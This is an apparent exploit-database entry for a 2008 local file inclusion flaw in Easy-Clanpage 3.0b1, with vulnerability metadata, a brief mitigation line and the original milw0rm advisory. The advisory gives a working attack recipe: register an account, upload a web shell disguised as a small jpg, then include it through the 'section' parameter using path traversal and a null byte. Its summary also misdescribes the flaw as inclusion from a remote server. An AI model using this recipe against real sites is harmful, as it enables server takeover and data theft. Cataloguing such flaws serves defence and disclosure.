LFI Exploit by Loader007

vendor:

Easy-Clanpage

by:

Loader007

7.5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Easy-Clanpage

Affected Version From: Easy-Clanpage 3.0b1

Affected Version To: Easy-Clanpage 3.0b1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

This exploit allows an attacker to include a malicious file from a remote server by using the 'section' parameter in the URL. The attacker can include a shell file as a jpg file with a size not bigger than 50kb. The malicious file can be included by using the URL http://example.de/path/?section=../path/to/image%00

Mitigation:

The mitigation for this vulnerability is to validate the user input and filter out any malicious characters or strings.

Source

Exploit-DB raw data:

####################################################################################
#LFI Exploit by Loader007
#
#you can connect me for questions ICQ:488525928
#
#Script:Easy-Clanpage 3.0b1
#
#download: 
http://www.easy-clanpage.de/?section=downloads&show=viewdownload&id=24
#
#http://example.de/path/?section=[LFI]%00
#
###################################################################################
#HowTo use it
#
#1: make a account
#2: up shell as jpg not bigger than 50kb!
#3: incude the jpg with http://example.de/path/?section=../path/to/image%00
#
#greetz to
#sys-flaw.com
#my friend's Tr0n,N1ReeXz and all the others
###################################################################################

# milw0rm.com [2008-06-13]